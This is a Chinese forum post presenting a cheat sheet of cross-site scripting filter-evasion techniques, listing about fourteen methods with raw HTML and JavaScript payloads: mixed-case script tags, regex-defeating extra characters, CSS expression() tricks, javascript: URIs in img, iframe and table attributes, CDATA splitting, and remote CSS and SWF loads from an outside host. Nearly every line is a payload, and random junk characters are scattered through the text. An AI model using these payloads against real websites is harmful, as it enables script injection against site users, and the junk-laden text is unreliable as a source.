找回密码
 立即注册
查看: 3777|回复: 0
打印 上一主题 下一主题

Cross Site Scripting(XSS)攻击手法介绍

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:59:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1. 改变字符大小写. O( c( R$ k1 {; a4 f

8 d$ U' C/ D- T3 ^
6 z, p, G$ v: k6 V% B2 A
! f/ p2 J; L  o/ |' q8 v+ g    <sCript>alert(‘d’)</scRipT>  b/ _4 Q! v! H% f5 X

! P: h, F# }& w; D4 U2. 利用多加一些其它字符来规避Regular Expression的检查
' w+ g& t  ]) E, w) C; s( y' n
) q* n. u/ N0 p& H! P! U" ^    <<script>alert(‘c’)//<</script>
( m# X% V& Y' k# s. l6 Z9 {! @' v+ c0 ^- D, b; u- q
    <SCRIPT a=">" SRC="t.js"></SCRIPT>  d- h' @0 X( u9 E4 ?
$ A9 w* r' b% Y# |
    <SCRIPT =">" SRC="t.js"></SCRIPT>! v: U- `) w3 y& ^0 v
/ n( @# |; L8 e% k7 T
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>4 V5 }" d% a/ c' f( r. n9 G( V, t
* X+ l7 k5 Q9 y0 [7 X3 ~3 G9 Y
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
+ W1 H' O: n4 @1 u, Q
- a6 j( o, h, [    <SCRIPT a=`>` SRC="t.js"></SCRIPT>8 j- b8 S' H2 z. U- d5 K

! z* l0 ]- a/ G5 h/ ]    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
0 ^0 k& o) g  Q4 X' `' r; ^. E$ u5 s( w" u: U# A# O
3. 以其它扩展名取代.js9 k! e; c' B: x- C) D
8 u' @+ P* j# v, B) O( l! N$ o
    <script src="bad.jpg"></script>
  F* t) p0 z9 |1 b& k( Q
: p: G+ {; a- {( R- w$ G4. 将Javascript写在CSS档里
( Y% b4 ^7 I2 e3 G0 V. O  U
& A! S0 Z1 U2 `    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">- u0 U. ?( }$ ^' p& z! |

7 f: B, U/ n  W8 p0 X& S( q! j       example:
. d6 Z7 {5 Z7 Y2 ]$ T' E3 V; p6 ]. x
          body {
( r0 U3 N/ l9 G5 _  C+ a" e5 }# |6 L5 e7 a4 J4 D, m" U6 V, L) S4 ?
               background-image: url(‘javascript:alert("XSS");’)/ s( Q2 u* S1 |5 N' f
5 T- H( _: B( l$ w
          }
" O' L/ R1 B: K8 F* |& @, y$ w( q. K$ x2 H- J* Y4 c5 f
5. 在script的tag里加入一些其它字符
9 s7 i/ N: r$ i- M" }7 b. U( z
    <SCRIPT/SRC="t.js"></SCRIPT>- j* n. D  P: e% x# j# O! e

7 B  q" |; f& q" B! W    <SCRIPT/anyword SRC="t.js"></SCRIPT>
" C; O! I2 p2 l6 x3 z7 R+ `# c5 ^
+ G* R& m/ U3 x' q) c$ U6. 使用tab或是new line来规避/ s/ t6 v+ d  G  o8 k9 I8 q
" t8 y* w0 k6 x
    <img src="jav ascr ipt:alert(‘XSS3′)">9 E2 L: A8 `% w

% ^! a; v; j% E. A- P    <img src="jav ascr ipt:alert(‘XSS3′)">
9 ^9 A2 P' S- G! z( F" A$ Q# f
3 b+ P" u# p2 ~9 w  S    <IMG SRC="jav ascript:alert(‘XSS’);">
. w5 @0 ^* V$ B' E. `( G8 ]' v% c* {+ h, c# X9 k4 C
         -> tag' x! a, C# E  ?$ t) C

! Y9 N% J' \2 q: C' |" U         -> new line8 Q. d# c0 k" P* {. z. i: ^- E  n4 X
6 [' I5 O6 J  _
7. 使用"\"来规避: \2 L* z: S9 X
9 N! B5 S5 g% d: ^7 W" r
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>; I1 e4 I& i$ G5 s: M
6 \8 B: ?) T$ t- Z$ s
    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
4 ?4 V+ I+ Z$ Z- L8 D
3 Q8 n1 I4 X" j7 K. o    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
  X, _& d' y9 }( j+ x7 m& l1 K9 t; }# @" F- c
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' X4 H8 N( a% Q  I

7 K7 R$ J: c! H; }+ P    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
% g* _: w. w% m1 N
3 n, H* L! F& O# U8. 使用Hex encode来规避(也可能会把";"拿掉)/ W6 M8 {$ y6 {4 [6 q

! f( m; }- T) W& k+ }/ F7 l; L    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># p8 f. j) ^( @& B% j& J

) l! C8 w: U0 z8 K6 t( M        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 d% ~( V) R6 H/ D, o/ s" ^. u! z2 v  r/ m% E
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 w8 `7 [  Z5 t: p: C
7 C" r, m% U# ?& i5 g1 i. [* d
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">6 M3 S' d4 ]% j  S" U! B$ d

. m$ j+ m( b9 f( s( \" V! u9. script in HTML tag
' j& Z( G; f9 P6 W1 I( Z, A# A1 J* z5 z7 j$ i
    <body onload=」alert(‘onload’)」>( w+ j) Y' T7 g
+ j# G" t& G. k
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload5 Q" A6 [, j3 Y% i* A$ p

  }" J0 b. w+ Y, H. S7 H10. 在swf里含有xss的code
" t5 l3 t% n+ i1 m% i
3 q5 q. }* n5 I3 j- R+ P5 c    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
4 i4 [4 H! n8 W9 v7 ]0 L* Q6 i
$ |& \- y* F2 V3 R* D11. 利用CDATA将xss的code拆开,再组合起来。/ X1 _8 E8 ~' e8 Y' P% |' B

! i' j, p7 @. n' }& Z* P. ^1 f7 D    <XML ID=I><X><C>
. F2 ]2 ^) u0 R) `! {7 ~" ~+ g9 Z8 e( ~% g2 p# B& G; f
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>4 ^8 G0 Y; a" l) k# K; ]
& b8 T7 o) z! u5 m$ E! b8 n
    </C></X>. N* |( w1 B2 y$ ~* y, i+ M

2 {: q# |$ l9 y! h' F* P+ e4 |/ I' y- K    </xml>
$ k: _  U" ^6 m* W! a  K+ ~  K0 A* r! c3 M" F
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
) p: Q9 m5 P' J: ~: ^  y
  U! ^) Z& U: s) X: Z    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>+ t& b$ Z& k7 L  U3 \

  P( k8 A( \0 I2 T# r    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
9 e+ B( l8 v0 ]' [+ t+ N
" e9 q, z/ d/ J% x# Y12. 利用HTML+TIME。
) N5 x4 I" H, o8 O
! _- H( H/ |, f. N# U8 {1 d) v& W7 v5 a    <HTML><BODY>
5 A0 Z! n) O: [( q7 W6 ]
  P7 B; X# l' i, l& Y    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">- R4 Q4 W/ ]0 t' I; J& z& G
7 D$ B$ A! E/ b6 _  o
    <?import namespace="t" implementation="#default#time2">
5 [' e$ @6 e# K# p
) b. L+ P1 v' }/ l+ h1 o2 K    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">+ ~: _' I5 g! I" d. [9 S2 J
1 M( g. D: _3 O2 ]+ F; n  M& R
    </BODY></HTML>* ^% }0 N9 ]3 M+ x
: H, P! Q" n6 j# J
13. 透过META写入Cookie。: O6 ?8 c3 b4 I& Y  N/ R! i. \" B0 s

5 ?9 u! @+ u- F$ h# h* X0 q3 W    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
4 l- i7 B3 C1 C8 j; e
8 X+ U: B* ~5 P' d14. javascript in src , href , url
: @* E: G9 N- u0 O- X: k
( U2 z' Y# `; S! E, ]    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
$ @+ b; I& l9 y: X! E/ n- ~) U  g: z8 R
    <img src="javascript:alert(‘XSS3′)">, L. K0 r8 W! E0 p
& c) h# _( ~( ?, d( {" c
<IMG DYNSRC="javascript:alert(‘XSS20′)">
5 ]5 g% s0 i6 j3 k0 `# G4 A
) ?' `8 u) u) E/ B! N    <IMG LOWSRC="javascript:alert(‘XSS21′)">1 P" b: i4 l( C" A: o3 s. g

& z* Z$ }" R6 b2 s3 o% [  h* b    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">" |6 ^0 ?7 S1 R! s2 \
, O( e* V) g+ O; I, Y% R
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
7 C# P$ |8 q& I. Q6 L7 B$ _+ |2 a- K8 ?5 V4 |" G5 Y
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
4 ^4 X. |0 m( L; w  V+ v6 [6 _3 e6 `. ^+ u$ X% Z, {/ b
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
& K' V, ~# L  z7 j) C" z
9 G; k( I9 ]$ y    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
$ w1 f8 L6 {8 e2 f% c5 J, S: a' `) g4 h) N
    </STYLE><A CLASS=XSS></A>
% r% \8 M) x, X/ T8 j
3 x- Y8 ~* W4 O. d, }$ A) M% e1 h    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>$ I' I) s7 v. f

/ ?5 R3 j* E- \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表